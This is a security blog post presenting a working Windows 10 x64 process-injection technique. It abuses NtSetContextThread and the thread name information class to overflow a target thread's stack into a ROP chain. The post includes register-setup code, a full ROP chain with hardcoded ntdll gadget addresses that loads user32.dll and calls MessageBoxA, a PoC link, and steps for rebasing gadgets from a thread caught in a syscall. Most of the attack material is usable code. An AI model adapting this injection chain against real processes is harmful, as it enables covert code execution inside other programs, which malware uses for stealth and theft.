I've recently been looking into NtSetContextThread as an exploit vector, and was looking at different ways of setting up state to load some code into our target thread and then execute it. The idea of ghost writing is pretty fun, but I wanted a way to do this in a single shot instead of having to loop over and have the thread otherwise in a waiting pattern (since we can't do anything useful when the thread is in a syscall).
Enter NtSetInformationThread(ThreadNameInformation). Blah Cats wrote a piece on using this to allocate kernel pages and get a peek into where a thread's KTHREAD is stored, but we can also use it as an easy way to get data into a target thread. The name is stored as a UNICODE_STRING in memory, which means we don't need to care about null-termination: we just provide a length and it copies the whole chunk with a memmove(), both when setting it and when retrieving it. We can then use NtSetContextThread() to make the app jump to a call to NtQueryInformationThread(ThreadNameInformation), and if we set the stack up right we can effectively overflow our own stack and return directly into the start of our ROP chain.
As usual, if you're following along at home you'll want a Windows 10 x64 kernel 20H2. Full PoC at github.com/samrussell/doublebarrell
Retrieving the ROP chain
The call to NtQueryInformationThread looks like this:
__kernel_entry NTSTATUS NtQueryInformationThread(
    [in]            HANDLE          ThreadHandle,
    [in]            THREADINFOCLASS ThreadInformationClass,
    [in, out]       PVOID           ThreadInformation,
    [in]            ULONG           ThreadInformationLength,
    [out, optional] PULONG          ReturnLength
);
We can set the first 4 parameters to registers with NtSetContextThread(), but the 5th one is a challenge. This is passed on the stack, and if it's set to 0 it's ignored, but if it's non-null then the call will dereference it to store the number of bytes copied. We aren't reading or writing memory directly so we have no guarantees of the state of the stack, so we have to find a way to set this ourselves.
Luckily for us, ntdll calls this in a bunch of different places. In nearly all of them it sets up the stack parameter first and then nukes all the volatile registers (bad), but there is one spot in DbgUiConvertStateChangeStructureWorker() where it sets up the volatile registers and then loads the stack parameter:
So we can set the 5 parameters in RCX, RDX, R8, R9 and RDI, set RIP to 1800CC777 (relocated), and this will store RDI at [RSP+20] and then call NtQueryInformationThread.
One last thing is to carefully set the ThreadInformation parameter so it overwrites our return address on the stack. NtQueryInformationThread() will write a UNICODE_STRING structure, which is 2 WORDs with length and maximum length, and then an aligned pointer to our buffer, followed by the buffer itself. When we make the call we'll push another pointer onto the stack, so we need to load this at current RSP - 3x QWORD (the 0x18 in the snippet that follows):
context.ContextFlags = CONTEXT_FULL;
GetThreadContext(hThread, &context);
context.ContextFlags |= 0x03;
context.Rsp = context.Rsp - 0x200 - sizeof(threadName); // make space on the stack
context.Rcx = 0xFFFFFFFFFFFFFFFE; // -2 = current thread
context.Rdx = 0x26; // ThreadNameInformation
context.R8 = context.Rsp - 0x18; // overflow ourselves
context.R9 = (threadInformation & 0xFFFF) + 0x10; // length
context.Rdi = 0; // NULL, don't update us
context.Rip = 0x7FFEE4F5C777; // relocated pointer
SetThreadContext(hThread, &context);
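The 0x18 and 0x10 offsets in that snippet fall out of the layout described above. Here is a minimal sketch of the arithmetic in portable C, assuming the 64-bit UNICODE_STRING header is 16 bytes (two 16-bit lengths, 4 bytes of padding, an 8-byte pointer) and that the gadget's call pushes one 8-byte return address. The function names are made up for illustration and are not taken from the PoC.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed layout of the data written back by the query on x64:
   USHORT Length, USHORT MaximumLength, 4 bytes padding, 8-byte Buffer pointer,
   followed by the name bytes themselves. */
#define UNICODE_STRING_HEADER_SIZE 0x10u
/* The call instruction inside the gadget pushes one return address. */
#define RETURN_ADDRESS_SIZE 0x08u

/* Hypothetical helper: value for ThreadInformation (R8) so that the first
   byte of the name lands exactly on the return address pushed by the call. */
static inline uint64_t overflow_target(uint64_t rsp_before_call)
{
    assert(rsp_before_call >= UNICODE_STRING_HEADER_SIZE + RETURN_ADDRESS_SIZE);
    return rsp_before_call - UNICODE_STRING_HEADER_SIZE - RETURN_ADDRESS_SIZE;
}

/* Hypothetical helper: address of the first name byte for a given R8. */
static inline uint64_t first_name_byte(uint64_t thread_information)
{
    return thread_information + UNICODE_STRING_HEADER_SIZE;
}

/* Hypothetical helper: ThreadInformationLength (R9) must cover header + name. */
static inline uint32_t query_length(uint16_t name_bytes)
{
    return (uint32_t)name_bytes + UNICODE_STRING_HEADER_SIZE;
}
```

With RSP at 0x1000 before the call, R8 comes out as 0xFE8 and the name starts at 0xFF8, which is the slot the call writes its return address to.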
So we set this up, and our target thread is straight into our ROP chain and will do what we like! Now for the proof of concept.
Shellcode courtesy of ntdll
At this point we search for gadgets that will let us pull the PEB out of GS:30 plus a bunch of other arithmetic to locate GetProcAddress. This gives us a big ugly ROP chain and requires a lot of gadgets to make it work. With ntdll we get a headstart with RtlGetCurrentPeb(), but we still need a bunch of gadgets that do stuff to RAX and return, as well as ways to store our data in non-volatile registers for later. I had a browse with ROPgadget and wasn't happy with what I found, but then I realized that ntdll is actually all we need and we don't need any arithmetic at all.
LoadLibrary -> LdrLoadDll
If we pull open kernelbase.dll we find that all roads lead to LoadLibraryExW(), which then calls LdrLoadDll() in ntdll. According to ntinternals.net, we can call it as follows:
LdrLoadDll(
    0,            // optional
    0,            // optional
    &filename,    // UNICODE_STRING
    &baseAddress  // void* that receives the module address
)
The awesome thing with this is that baseAddress gets stored to a pointer of our choosing, so we can just point this to further down our ROP chain and it'll automatically get loaded into a register later on. Easy.
GetProcAddress -> LdrGetProcedureAddressForCaller()
GetProcAddress() is also backed by a function in ntdll. The LdrGetProcedureAddressForCaller() function takes 6 params but there's another function that wraps it called LdrGetProcedureAddress() that only takes 4:
LdrGetProcedureAddress(
    baseAddress,  // address we got from LdrLoadDll()
    &procName,    // a STRING with the name of the function we want
    0,            // ordinal, given we're tailoring this to a specific build we can use this if we like
    &procAddress  // void* that receives the function address
)
As with LdrLoadDll(), the last parameter is a pointer to where the function address will be stored, so this can point right back into our ROP chain too. All we need now is a couple of gadgets and we'll be sorted.
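To make the "point it back into the chain" trick concrete, here is a small self-contained sketch. It assumes the chain is an array of QWORDs that starts 0x10 bytes past the ThreadInformation pointer (after the UNICODE_STRING header), which matches offsets such as R8 + 0xB8 used in the full chain later in the post. `slot_address` and `fake_lookup` are hypothetical names; `fake_lookup` only stands in for any API that returns its result through an out pointer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: chain slot 0 sits right after the 0x10-byte UNICODE_STRING header. */
#define CHAIN_START_OFFSET 0x10u

/* Hypothetical helper: address of chain slot `index`, relative to the
   ThreadInformation pointer (R8) the chain was written to. */
static inline uint64_t slot_address(uint64_t thread_information, size_t index)
{
    return thread_information + CHAIN_START_OFFSET + 8u * (uint64_t)index;
}

/* Stand-in for an out-parameter API: writes its result where it is told to. */
static inline void fake_lookup(uint64_t *out, uint64_t result)
{
    assert(out != NULL);
    *out = result;
}
```

If the out pointer is the address of a slot that a later gadget pops into RCX, the result is already in place by the time that gadget runs, so no register shuffling is needed.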
LdrpHandleInvalidUserCallTarget: the mother of all gadgets
All of this is static: we know our pointers, we know our arguments, and the two functions we call are loading the arguments right into our ROP chain. All we need now is a way to populate our volatile registers for parameters 1-4. Enter my favorite function in ntdll: LdrpHandleInvalidUserCallTarget(). I don't know what this does, and I don't really care, but what I do care about is that it populates all of the registers we care about before returning:
So whenever we want to call a function we just need to set up the stack like this:
- address of LdrpHandleInvalidUserCallTarget gadget
- param 2 (RDX)
- param 1 (RCX)
- param 3 (R8)
- param 4 (R9)
- null (R10)
- null (R11)
- function we want to call
- address of return gadget
- 4x QWORD for shadow stack
I've also kept my data inline with my calls and just step over it when I'm done with it, and this gadget lets us dump up to 7 QWORDs at a time from the stack.
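The stack layout in the list above can be written as a small helper. This is only a sketch: `emit_call` is a hypothetical name, the chain is assumed to be a plain array of QWORDs, and the four shadow-stack QWORDs are left for the caller to reserve after the returned index.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Gadget address, six popped registers, target function, return gadget. */
#define CALL_FRAME_QWORDS 9u

/* Hypothetical helper: writes one call frame starting at chain[at], in the
   order the gadget pops it, and returns the index where the 4 shadow-stack
   QWORDs should begin. */
static inline size_t emit_call(uint64_t *chain, size_t at,
                               uint64_t populate_gadget, uint64_t function,
                               uint64_t return_gadget,
                               uint64_t rcx, uint64_t rdx,
                               uint64_t r8, uint64_t r9)
{
    assert(chain != NULL);
    chain[at + 0] = populate_gadget; /* LdrpHandleInvalidUserCallTarget gadget */
    chain[at + 1] = rdx;             /* param 2 */
    chain[at + 2] = rcx;             /* param 1 */
    chain[at + 3] = r8;              /* param 3 */
    chain[at + 4] = r9;              /* param 4 */
    chain[at + 5] = 0;               /* R10, unused */
    chain[at + 6] = 0;               /* R11, unused */
    chain[at + 7] = function;        /* function we want to call */
    chain[at + 8] = return_gadget;   /* where the function returns to */
    return at + CALL_FRAME_QWORDS;
}
```

Note that RDX comes before RCX in the frame, so the argument order on the stack does not match the parameter order of the function being called.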
Putting it all together
Here's the full ROP chain I use to inject a MessageBox call:
// set up shellcode
threadName[0] = 0x7FFEE4F1C550; // populate registers
threadName[1] = 0;
threadName[2] = 0;
threadName[3] = context.R8 + 0x80; // &UNICODE_STRING("user32.dll")
threadName[4] = context.R8 + 0xB8; // &baseAddress
threadName[5] = 0;
threadName[6] = 0;
threadName[7] = 0x7FFEE4EA6A10; // LdrLoadDll
threadName[8] = 0x7FFEE4F1C553; // pop 4 registers
// shadow stack break
threadName[13] = 0x7FFEE4F1C551; // pop 5 registers
threadName[14] = 0x0000000000160014; // UNICODE_STRING("user32.dll")
threadName[15] = context.R8 + 0x90;
threadName[16] = 0x0072006500730075;
threadName[17] = 0x0064002E00320033;
threadName[18] = 0x00000000006C006C;
threadName[19] = 0x7FFEE4F1C550; // populate registers
threadName[20] = context.R8 + 0x120; // &STRING("MessageBoxA")
threadName[21] = 0; // baseAddress, filled in by LdrLoadDll
threadName[22] = 0;
threadName[23] = context.R8 + 0x178; // &procAddress
threadName[24] = 0;
threadName[25] = 0;
threadName[26] = 0x7FFEE4F11AD0; // LdrGetProcedureAddress
threadName[27] = 0x7FFEE4F1C551; // pop 5 registers (shadow stack + 1xQWORD for alignment)
// shadow stack break
threadName[33] = 0x7FFEE4F1C553; // pop 4 registers
threadName[34] = 0x00000000000C000B; // STRING("MessageBoxA")
threadName[35] = context.R8 + 0x130;
threadName[36] = 0x426567617373654D;
threadName[37] = 0x000000000041786F;
threadName[38] = 0x7FFEE4F1C550; // populate registers
threadName[39] = context.R8 + 0x188; // &message
threadName[40] = 0;
threadName[41] = context.R8 + 0x190; // &caption
threadName[42] = 0;
threadName[43] = 0;
threadName[44] = 0;
threadName[45] = 0; // MessageBoxA, filled in by LdrGetProcedureAddress
threadName[46] = 0x7FFEE4E9DD1B; // infinite loop gadget (0xEB 0xFE) for debugging
threadName[47] = 0x00313144454E5750;
threadName[48] = 0x00747577206C6F6C;
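The magic constants in the chain are just strings and string headers packed into little-endian QWORDs. The sketch below shows one way to produce them rather than typing them by hand. The helper names are hypothetical, and the UTF-16 packer only handles plain ASCII input.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* First QWORD of a STRING / UNICODE_STRING: Length in bits 0-15,
   MaximumLength in bits 16-31, upper 4 bytes are padding. */
static inline uint64_t pack_string_header(uint16_t length, uint16_t maximum_length)
{
    return (uint64_t)length | ((uint64_t)maximum_length << 16);
}

/* Packs up to 8 ASCII bytes into one little-endian QWORD (zero padded). */
static inline uint64_t pack_ascii(const char *text)
{
    size_t n = strlen(text);
    uint64_t qword = 0;
    assert(n <= 8);
    for (size_t i = 0; i < n; i++)
        qword |= (uint64_t)(unsigned char)text[i] << (8 * i);
    return qword;
}

/* Packs up to 4 ASCII characters as UTF-16LE code units into one QWORD. */
static inline uint64_t pack_utf16(const char *text)
{
    size_t n = strlen(text);
    uint64_t qword = 0;
    assert(n <= 4);
    for (size_t i = 0; i < n; i++)
        qword |= (uint64_t)(unsigned char)text[i] << (16 * i);
    return qword;
}
```

For example, pack_utf16("user") gives 0x0072006500730075 and pack_ascii("MessageB") gives 0x426567617373654D, matching the values in the chain. The 0x14 length in the first header is 20 bytes, i.e. the 10 UTF-16 characters of "user32.dll".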
A note on alignment
MessageBoxA() is one of those annoying functions that backs up the XMM registers and just assumes the stack is 16-byte aligned. I've skipped over the details on this but you'll need to keep this in mind whenever you're building ROP chains that operate on anything that needs to be 16-byte aligned.
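As a rough rule of thumb, the Windows x64 calling convention expects RSP to be 16-byte aligned just before a call, which means RSP is 8 past a 16-byte boundary at the function's first instruction (the return address has just been pushed). A minimal sketch of that check follows, with hypothetical helper names. In a ROP chain the "entry RSP" is the address of the slot holding the return gadget.

```c
#include <assert.h>
#include <stdint.h>

/* At function entry the return address has just been pushed, so a correctly
   aligned caller leaves RSP congruent to 8 modulo 16. */
static inline int entry_is_aligned(uint64_t rsp_at_entry)
{
    assert((rsp_at_entry & 0x7) == 0); /* assume the stack is at least QWORD aligned */
    return (rsp_at_entry & 0xF) == 0x8;
}

/* Hypothetical helper: number of extra QWORDs to skip before the call so the
   callee sees an aligned stack (0 or 1 for a QWORD-aligned stack). */
static inline unsigned padding_qwords(uint64_t rsp_at_entry)
{
    return entry_is_aligned(rsp_at_entry) ? 0u : 1u;
}
```

This is why one of the pop gadgets in the chain above pops 5 QWORDs instead of 4: the extra slot shifts everything after it by 8 bytes.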
I've been testing this on easy mode (on a binary that has an infinite loop so doesn't end up in a syscall when we call NtSetContextThread(), and doesn't appear to have ASLR enabled). We also jump out to an infinite loop gadget at the end to avoid cleanup.
Identifying and returning from a syscall
There are a few ways to figure this out: R10 has some good clues, RAX will be set to a low value corresponding to the syscall number, and RIP should be quite high. We actually want to catch the thread in a syscall though, as this gives us a bunch of clues for where to offset our gadgets from. As mentioned in NINA, we can always set RIP to an infinite loop split instruction and jump out there (ntdll has tons to choose from); once we're there we can do a second call to kick off our injection. You'll want to store RAX after relocating to the infinite loop, as you'll need to put it back when cleaning up (the RAX you picked up in the syscall is there before the syscall itself returns).
The advantage of getting the thread context while it's in a syscall is that we know what it was called with (RAX), and the return address (RIP), which means we know exactly which function in ntdll was hit. We can then look up the RVA, subtract it from RIP and we have the base of ntdll, which we can use to adjust the addresses for our gadgets and function calls.
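The rebasing arithmetic is short enough to sketch. The helper names are hypothetical, and the preferred image base of 0x180000000 is an assumption read off the unrelocated 1800CC777 address quoted earlier. The worked numbers reuse that gadget's two addresses as a stand-in for an observed RIP and its RVA.

```c
#include <assert.h>
#include <stdint.h>

/* RVA of an address as shown in a disassembler at the preferred image base. */
static inline uint64_t rva_from_preferred(uint64_t preferred_address,
                                          uint64_t preferred_base)
{
    assert(preferred_address >= preferred_base);
    return preferred_address - preferred_base;
}

/* Runtime module base, given a runtime address and its known RVA. */
static inline uint64_t module_base(uint64_t runtime_address, uint64_t rva)
{
    assert(runtime_address >= rva);
    return runtime_address - rva;
}

/* Runtime address of any other gadget or function in the same module. */
static inline uint64_t relocate(uint64_t base, uint64_t rva)
{
    return base + rva;
}
```

With 0x7FFEE4F5C777 as the runtime address and 0xCC777 as its RVA, the base comes out as 0x7FFEE4E90000. On that base, the LdrLoadDll address used in the chain (0x7FFEE4EA6A10) corresponds to RVA 0x16A10.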
Unless your target thread has been naughty and stored data below RSP, all you need to do is fix up RIP. Everything else that we clobbered also gets clobbered in a syscall so we don't care. We've left all our strings and gadget addresses in stack memory, so you're welcome to zero it out if you care, but that's an exercise for the reader.